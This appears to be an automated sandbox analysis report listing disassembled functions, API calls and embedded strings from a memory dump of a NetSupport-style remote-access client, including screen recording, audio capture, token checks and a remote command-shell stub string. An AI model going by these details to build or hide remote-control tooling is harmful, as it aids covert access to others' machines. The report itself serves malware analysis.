Instruction ID: 59b0643e97b9a631c3f20454355d2f3f74fc8d6a298a7c9c16ab6adfcb60d694
Opcode Fuzzy Hash: 8028d4dc932e1339b2f89bcb4110677fa4ed6e49f558c24d2048efc34b971f3a
Instruction Fuzzy Hash: 89917975A152289FDB60CF28C894ADAFBB4EF89725F0180E9E94D97355D7309E80CF90

Function 1101B1C0 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 203COMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 1101B20C
GetClientRect.USER32(00000000,?), ref: 1101B23A
CreateSolidBrush.GDI32(?), ref: 1101B244
FillRect.USER32(?,?,00000000), ref: 1101B258
GetStockObject.GDI32(00000011), ref: 1101B269
SelectObject.GDI32(?,00000000), ref: 1101B27A
DrawTextA.USER32(?,00000000,000000FF,?,00000001), ref: 1101B2A3
SelectObject.GDI32(?,00000000), ref: 1101B2AE
DeleteObject.GDI32(?), ref: 1101B3AC
EndPaint.USER32(?,?), ref: 1101B3BA

Part of subcall function 1114D430: SetWindowLongA.USER32(?,000000FC,?), ref: 1114D476
Part of subcall function 1114D430: RemovePropA.USER32(?), ref: 1114D495
Part of subcall function 1114D430: RemovePropA.USER32(?), ref: 1114D4A4
Part of subcall function 1114D430: RemovePropA.USER32(?,00000000), ref: 1114D4B3

Strings

NSMBmpClass WM_PAINT rcClt L=%d, T=%d, R=%d, B=%d, W=%d, H=%d, xrefs: 1101B2F7
m_hWnd, xrefs: 1101B225
e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 1101B220
picholder w=%d, h=%d, xrefs: 1101B339
NSMBmpClass WM_PAINT rcNew L=%d, T=%d, R=%d, B=%d, W=%d, H=%d, xrefs: 1101B31C

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$PropRemove$PaintRectSelect$BeginBrushClientCreateDeleteDrawFillLongSolidStockTextWindow
String ID: NSMBmpClass WM_PAINT rcClt L=%d, T=%d, R=%d, B=%d, W=%d, H=%d$NSMBmpClass WM_PAINT rcNew L=%d, T=%d, R=%d, B=%d, W=%d, H=%d$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd$picholder w=%d, h=%d
API String ID: 3417689559-267201724
Opcode ID: 0f0fde7be0d9a163d168c234d32f8707ec11b46134b45822327dab59a907cea7
Instruction ID: 4dbc0ed789370292590261d06177d4a80673600d05af41177adcb8a0809f0c2d
Opcode Fuzzy Hash: 0f0fde7be0d9a163d168c234d32f8707ec11b46134b45822327dab59a907cea7
Instruction Fuzzy Hash: 03611BB6E00619AFCB04CFA8CD84DEEF7B9FB88714F108559E915A7244EB74AD04CB61

Function 1101B3E0 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 173filelibrarycomCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000001,00000000), ref: 1101B3FE
CloseHandle.KERNEL32(00000000), ref: 1101B42E
LoadLibraryA.KERNEL32(PCIImage.dll), ref: 1101B450
CloseHandle.KERNEL32(00000000), ref: 1101B472
GetProcAddress.KERNEL32(00000000,DecompressPNGToBitmap), ref: 1101B489
FreeLibrary.KERNEL32(00000000), ref: 1101B4A1
GetFileSize.KERNEL32(00000000,00000000), ref: 1101B4AA
GlobalAlloc.KERNEL32(00000042,00000000), ref: 1101B4B5
GlobalLock.KERNEL32(00000000), ref: 1101B4BE
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 1101B4CD
GlobalUnlock.KERNEL32(00000000), ref: 1101B4D4
CloseHandle.KERNEL32(00000000), ref: 1101B4DB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 1101B4EF
OleLoadPicture.OLEAUT32(00000000,00000000,00000000,111AC60C,-0000001C), ref: 1101B513
DeleteObject.GDI32(00000000), ref: 1101B53B

Strings

DecompressPNGToBitmap, xrefs: 1101B483
PCIImage.dll, xrefs: 1101B44B

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Global$CloseFileHandle$CreateLibraryLoad$AddressAllocDeleteFreeLockObjectPictureProcReadSizeStreamUnlock
String ID: DecompressPNGToBitmap$PCIImage.dll
API String ID: 2291646601-2375843702
Opcode ID: cc2f3a6f886d93ff8ea9a700d807c02b635d1048fb06df1f0aa03edf9b03c29d
Instruction ID: 62cfc7fa3e2055ec9800540563fbb578b27e0b4a6d2d587e1a7a746e2869ae39
Opcode Fuzzy Hash: cc2f3a6f886d93ff8ea9a700d807c02b635d1048fb06df1f0aa03edf9b03c29d
Instruction Fuzzy Hash: F351C076B40214AFE711EBA5DC88F9EBBACEB85724F04C165F906DB284DB74D901C7A0

Function 1112B230 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 308COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000010,00000000,111DC1A0,00000000), ref: 1112B2C2
SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 1112B2D5
SHGetFolderPathA.SHFOLDER(00000000,00000010,00000000,00000000,00000000), ref: 1112B46D
GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1112B483
CloseHandle.KERNEL32(00000000), ref: 1112B4CB

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 1112B613

Strings

ShowRecord, xrefs: 1112B3C9, 1112B3E1, 1112B3F9, 1112B4DF, 1112B513
Show, xrefs: 1112B426
\Desktop, xrefs: 1112B498
ShowToWindow, xrefs: 1112B32F, 1112B359, 1112B38A, 1112B3A5, 1112B5EB
PrefixName, xrefs: 1112B3F4
Client, xrefs: 1112B334, 1112B35E, 1112B38F, 1112B3AA, 1112B5F0
ReplayFiles, xrefs: 1112B3C4
UI: End Show, xrefs: 1112B5A9
ReplayPath, xrefs: 1112B421, 1112B4DA
RecordAudio, xrefs: 1112B3DC
UI: Start Show, xrefs: 1112B295

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InfoParametersSystem$CloseDirectoryFolderHandlePathWindows__wcstoi64
String ID: Client$PrefixName$RecordAudio$ReplayFiles$ReplayPath$Show$ShowRecord$ShowToWindow$UI: End Show$UI: Start Show$\Desktop
API String ID: 3054845645-718119679
Opcode ID: c7cdb9ffde126c6b3fe575eadcf5334cacc0dbbecfc6774e9ccc9823c0533ac5
Instruction ID: 4a8e56dd47aa2ec122ad2e2a6e1493817fcda6923c0d3750c0c878d0569fa937
Opcode Fuzzy Hash: c7cdb9ffde126c6b3fe575eadcf5334cacc0dbbecfc6774e9ccc9823c0533ac5
Instruction Fuzzy Hash: B4B10874B41665BFEB14DB60CD85FDAF761BB44718F608128FE2A6B2C4DB706800CB99

Function 110C19F0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 117registryclipboardCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(111DDB60,?,00000000,00000000,?,110C1BAA,110594BF,?,00000000,?,110B4E99,00000000,00000000,?,110594BF,?), ref: 110C19FE
RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 110C1A0F
RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 110C1A1B
GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110C1A40
LoadCursorA.USER32(00000000,00007F00), ref: 110C1A71
RegisterClassExA.USER32(?), ref: 110C1A92
_memset.LIBCMT ref: 110C1ABB
GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110C1AD6
LoadCursorA.USER32(00000000,00007F00), ref: 110C1B0B
RegisterClassExA.USER32(?), ref: 110C1B2C
LeaveCriticalSection.KERNEL32(111DDB60,0000000E), ref: 110C1B55
LeaveCriticalSection.KERNEL32(111DDB60,?,?,?,?,110C1BAA,110594BF,?,00000000,?,110B4E99,00000000,00000000,?,110594BF,?), ref: 110C1B6B

Part of subcall function 110B9150: __recalloc.LIBCMT ref: 110B9198

Strings

WM_ATLGETHOST, xrefs: 110C1A0A
AtlAxWin100, xrefs: 110C1A32, 110C1A88
WM_ATLGETCONTROL, xrefs: 110C1A11
AtlAxWinLic100, xrefs: 110C1ACD, 110C1B22

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc_memset
String ID: AtlAxWin100$AtlAxWinLic100$WM_ATLGETCONTROL$WM_ATLGETHOST
API String ID: 2220097787-1587594278
Opcode ID: 1280d4e5a9654bbb90da870e371f2f47ae10926f6bfc067971466cbc78275a9c
Instruction ID: 709a6cad7dad08e028e171eda58a7206c5113b9d1b734c7660354489d21fdec9
Opcode Fuzzy Hash: 1280d4e5a9654bbb90da870e371f2f47ae10926f6bfc067971466cbc78275a9c
Instruction Fuzzy Hash: 004149B6D02228AFCB01DF95D988AEEFBB9FB49714F50416AF515B3240D7345A04CFA4

Function 110035B0 Relevance: 27.2, APIs: 18, Instructions: 171COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000004), ref: 110035F1

Part of subcall function 111319C0: SetBkColor.GDI32(?,00000000), ref: 111319D4
Part of subcall function 111319C0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111319E9
Part of subcall function 111319C0: SetBkColor.GDI32(?,00000000), ref: 111319F1

CreateSolidBrush.GDI32(00000000), ref: 11003605
GetStockObject.GDI32(00000007), ref: 11003610
SelectObject.GDI32(?,00000000), ref: 1100361B
SelectObject.GDI32(?,?), ref: 1100362C
GetSysColor.USER32(00000010), ref: 1100363C
GetSysColor.USER32(00000010), ref: 11003653
GetSysColor.USER32(00000014), ref: 1100366A
GetSysColor.USER32(00000014), ref: 11003681
GetSysColor.USER32(00000014), ref: 1100369E
GetSysColor.USER32(00000014), ref: 110036B5
GetSysColor.USER32(00000010), ref: 110036CC
GetSysColor.USER32(00000010), ref: 110036E3
InflateRect.USER32(?,000000FE,000000FE), ref: 11003700
Rectangle.GDI32(?,?,00000001,?,?), ref: 1100371A
SelectObject.GDI32(?,?), ref: 1100372E
SelectObject.GDI32(?,?), ref: 11003738
DeleteObject.GDI32(?), ref: 1100373E

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
String ID:
API String ID: 3698065672-0
Opcode ID: 04c01b13460c93f31d2d2e389f35455b7ffd5bfe07828e99ddf090b4159d3ad7
Instruction ID: 2bc938ab10bd54deed445a78db49907ee5b49920563a61e7829f7d323b0f7c60
Opcode Fuzzy Hash: 04c01b13460c93f31d2d2e389f35455b7ffd5bfe07828e99ddf090b4159d3ad7
Instruction Fuzzy Hash: A7514EB6900609AFD710DFA5CC85EBFF3BCEF98705F104A18EA1297285D670B9058BA1

Function 1108D7B0 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 225COMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32 ref: 1108D831
GetLastError.KERNEL32 ref: 1108D83B
GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 1108D859
_malloc.LIBCMT ref: 1108D862
GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,00000000,00000000,00000000), ref: 1108D87C
LookupAccountSidA.ADVAPI32(00000000,00000000,?,?,00000000,?,?), ref: 1108D8CA
GetSidIdentifierAuthority.ADVAPI32(00000000), ref: 1108D8E3
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 1108D8EA
GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 1108D8F3
GetTokenInformation.ADVAPI32(00000000,00000002,?,00002000,00000000), ref: 1108D931
_malloc.LIBCMT ref: 1108D956
GetTokenInformation.ADVAPI32(00000000,00000002,00000000,00001000,?), ref: 1108D974
_free.LIBCMT ref: 1108DA92
_free.LIBCMT ref: 1108DAA1

Strings

advapi, xrefs: 1108D99E

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InformationToken$Authority$_free_malloc$AccountCountErrorIdentifierLastLookup
String ID: advapi
API String ID: 2675550055-46682764
Opcode ID: c9eaaf56747d9f20481a1d451ec77545b62f29935d5b421324d7b6e8246488e3
Instruction ID: e41896da37f67aad26cc8bb122dbe4d69e903b7b164305b4c007e48cc011dbc7
Opcode Fuzzy Hash: c9eaaf56747d9f20481a1d451ec77545b62f29935d5b421324d7b6e8246488e3
Instruction Fuzzy Hash: F4813171D042299BEB11CF55CC88BDEB7F8AF49308F5041E9E949A7241E770AE94CFA1

Function 1100B310 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON

Download Yara Rule

APIs

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

_malloc.LIBCMT ref: 1100B366

Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616

Part of subcall function 1100AC40: EnterCriticalSection.KERNEL32(000000FF,2F623E72,?,00000000,00000000), ref: 1100AC84
Part of subcall function 1100AC40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACA2
Part of subcall function 1100AC40: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ACF7
Part of subcall function 1100AC40: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD37
Part of subcall function 1100AC40: CloseHandle.KERNEL32(00000000), ref: 1100AD3E
Part of subcall function 1100AC40: _free.LIBCMT ref: 1100AD53
Part of subcall function 1100AC40: FreeLibrary.KERNEL32(?), ref: 1100AD6B
Part of subcall function 1100AC40: LeaveCriticalSection.KERNEL32(?), ref: 1100AD75

EnterCriticalSection.KERNEL32(1100CA5A,Audio,DisableSounds,00000000,00000000,2F623E72,?,1100CA4A,00000000,?,1100CA4A,?), ref: 1100B39B
CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA4A,?), ref: 1100B3B8
_calloc.LIBCMT ref: 1100B3E9
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA4A,?), ref: 1100B40F
LeaveCriticalSection.KERNEL32(1100CA5A,?,1100CA4A,?), ref: 1100B449
LeaveCriticalSection.KERNEL32(1100CA4A,?,?,1100CA4A,?), ref: 1100B46E

Strings

Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4C3
Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B51C
Vista AddAudioCapEvtListener(%p), xrefs: 1100B4F3
Vista new pAudioCap=%p, xrefs: 1100B4D3
Audio, xrefs: 1100B347
InitCaptureSounds NT6, xrefs: 1100B48E
DisableSounds, xrefs: 1100B342
\\.\NSAudioFilter, xrefs: 1100B3B0

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
API String ID: 1843377891-2362500394
Opcode ID: 79611e6164933f99766dae91f25cc5ee098dd66fa8ec6328b19abf292caf1c3e
Instruction ID: f6a869108093e80182554cf0a38d57943248311c262823834013d1bf8f3ce35d
Opcode Fuzzy Hash: 79611e6164933f99766dae91f25cc5ee098dd66fa8ec6328b19abf292caf1c3e
Instruction Fuzzy Hash: 9151F7B5E04A46AFE704CF64DC80B9EFBA8FB45359F10467AE91993240EB31B550CBA1

Function 110559E0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 147COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11055A13
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,75922EF0,75922EE0,75932D70), ref: 11055A54
SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11055A66
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11055A70
SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11055A7C
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11055A86
SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11055A92
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11055A9C
SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11055AA8
ResetEvent.KERNEL32(00000000), ref: 11055AB0
wsprintfA.USER32 ref: 11055ADD
CloseHandle.KERNEL32(?), ref: 11055B89

Part of subcall function 11085890: _memset.LIBCMT ref: 110858F9
Part of subcall function 11085890: GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,75922F10,?,1105649A), ref: 11085912
Part of subcall function 11085890: GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,?,75922F10,?,1105649A), ref: 11085944
Part of subcall function 11085890: CloseHandle.KERNEL32(00000000), ref: 1108597C

Strings

D, xrefs: 11055A2D
remcmdstub.exe %u %u %u %u %%COMSPEC%%, xrefs: 11055AD7
CloseHandle_1, xrefs: 11055B96

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Handle$EventInformation$Create$Close_memset$ResetTokenVersionwsprintf
String ID: CloseHandle_1$D$remcmdstub.exe %u %u %u %u %%COMSPEC%%
API String ID: 3301782102-1870880251
Opcode ID: e163fffb9c58c4000c61b5181b0b088c97a77f7d3ab2993e00211e6cbc90ccb2
Instruction ID: 122a9679eecca1cb569060f32b9ece46289109df8fedbfa5edd3c7074cdf9754
Opcode Fuzzy Hash: e163fffb9c58c4000c61b5181b0b088c97a77f7d3ab2993e00211e6cbc90ccb2
Instruction Fuzzy Hash: 4F515771A41328AFEB50DF65CC89FDAB7B5EB48B14F004199FA18AB2C4D7B16980CF54

Function 110AB980 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 411timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(00000000,?,?), ref: 110AB9A1
_memmove.LIBCMT ref: 110ABB4D
timeGetTime.WINMM ref: 110ABDEF

Strings

%d pieces (max pieces=%d), xrefs: 110ABE18

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
